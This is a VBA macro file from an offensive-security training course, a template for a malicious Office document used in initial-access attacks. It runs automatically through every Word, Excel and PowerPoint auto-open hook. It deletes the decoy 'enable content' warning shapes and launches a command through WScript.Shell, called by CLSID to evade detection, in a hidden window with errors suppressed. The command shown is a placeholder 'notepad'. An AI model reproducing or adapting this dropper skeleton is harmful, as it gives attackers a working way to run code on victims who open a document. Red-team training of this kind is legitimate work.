'#
'# Copyright (C) Binary-Offensive.com Mariusz Banach - All Rights Reserved
'# Unauthorized copying of this file, via any medium is strictly prohibited.
'#
'# This file/directory was part of Modern Initial Access and Evasion Tactics training
'# delivered by binary-offensive.com and was provided as supplemental material.
'# 
'# Authored by Mariusz Banach <mb@binary-offensive.com>, @mariuszbit / mgeeky
'#


Sub obf_LaunchCommand(ByVal obf_command As String)
    On Error GoTo obf_ProcError
    With CreateObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8")
        .Run obf_command, 0, False
    End With
obf_ProcError:
End Sub

Function obf_DeleteWarningShape(ByVal obf_textBoxName As String, ByVal obf_saveDocAfter As Boolean) As Boolean
    On Error GoTo obf_ProcError
    Dim obf_shape As Excel.shape
    Dim obf_removed
    Dim obf_names
    obf_removed = False
    On Error Resume Next
    
    obf_names = Split(obf_textBoxName, ",")
    For obf_idx = LBound(obf_names) To UBound(obf_names)
        For Each obf_shape In Worksheets(1).Shapes
            If StrComp(obf_shape.Name, obf_names(obf_idx)) = 0 Then
                obf_shape.Delete
                obf_removed = True
                Exit For
            End If
        Next
    Next

    If obf_saveDocAfter Then
        ThisWorkbook.Save
    End If
    obf_DeleteWarningShape = obf_removed
obf_ProcError:
End Function


Sub obf_MacroEntryPoint()
    On Error Resume Next

    obf_DeleteWarningShape "warning-div,warning-pic", False
    
    obf_GeneratorEntryPoint
    
End Sub

Sub obf_GeneratorEntryPoint()
    On Error GoTo obf_ProcError
    Dim obf_code
    obf_code = ""
    

    obf_LaunchCommand "notepad"

obf_ProcError:
End Sub

Sub Document_Open()
    ' Becomes launched as second, another try, on MS Word / Publisher
    obf_MacroEntryPoint
End Sub

Sub Workbook_Open()
    ' Becomes launched as second, another try, on MS Excel
    obf_MacroEntryPoint
End Sub

Sub OnPowerPoint()
    obf_MacroEntryPoint
End Sub

Sub AutoOpen()
    ' Becomes launched as first on MS Word / Publisher
    obf_MacroEntryPoint
End Sub

Sub Auto_Open()
    ' Becomes launched as first on MS Excel
    obf_MacroEntryPoint
End Sub